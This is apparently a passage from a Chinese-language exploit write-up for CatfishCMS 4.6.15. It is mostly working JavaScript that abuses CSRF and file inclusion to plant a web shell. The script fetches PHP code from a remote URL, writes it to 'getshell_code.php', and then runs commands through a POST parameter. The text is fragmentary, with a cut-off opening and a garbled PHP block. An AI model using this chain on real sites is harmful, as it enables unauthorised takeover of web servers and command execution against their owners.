007-CatfishCMS 4.6.15 csrf getshell

‘);
$(‘body’).append(‘

‘);

$.ajax({
url: url+directory+articles,
dataType: “json”,
success: function(verification_content){
$(‘#csrf_verification’).append(verification_content);
var verification = $(‘#verification’).html();//用来绕过验证的
// alert(verification);

//csrf生成文章,引起文件包含漏洞
$.ajax({
type: “POST”,
url: url+directory+newpage,
data: {
‘biaoti’:’xss_csrf_getshll’,
‘template’:img_trojan_url,
‘verification’:verification,
‘fabushijian’:’2017-12-05 11:56:48′
},
success: function(){
//csrf获取shell链接
$.ajax({
type: “POST”,
url: url+directory+allpage,
success: function(allpage_content){
$(‘#csrf_allpage’).append(allpage_content);
var shell_id = $(‘#csrf_allpage .table-responsive .table-bordered tbody tr td .gouxuan’).eq(0).val();
var shell_url = $(‘#csrf_allpage .table-responsive .table-bordered tbody tr td a’).eq(0).attr(‘href’);

var shell_content = ”;
shell_content+= “$myfile = fopen(‘getshell_code.php’, ‘w’);”;
shell_content+= ‘$txt = ‘+’file_get_contents(“‘+getshell_code+'”);’;
shell_content+= ‘fwrite($myfile, $txt);’;
console.log(shell_content);

//执行shell 生成马子
$.ajax({
type: “POST”,
url: url+shell_url,
dataType: “json”,
data: {‘ddd’:shell_content},
success: function(data){
$.ajax({
type: “GET”,
url: url+directory+’getshell_code.php’,
dataType: “json”,
// data: {‘zzz’:1}
});
},
error: function(){
$.ajax({
type: “GET”,
url: url+directory+’getshell_code.php’,
dataType: “json”,
// data: {‘zzz’:1}
});
}
});

}
});

}
});

}
});
“`



写好以后模拟管理员，进入后台





getshell_code

“`php
query($sql);
$pdo->query($sql_1);
unlink(‘getshell_code.php’);
}
?>
“`


连接马子的操作，这个文件会在index.php中给引入所以直接

“`
http://url/index.php

POST

ddd = 你要执行的命令
“`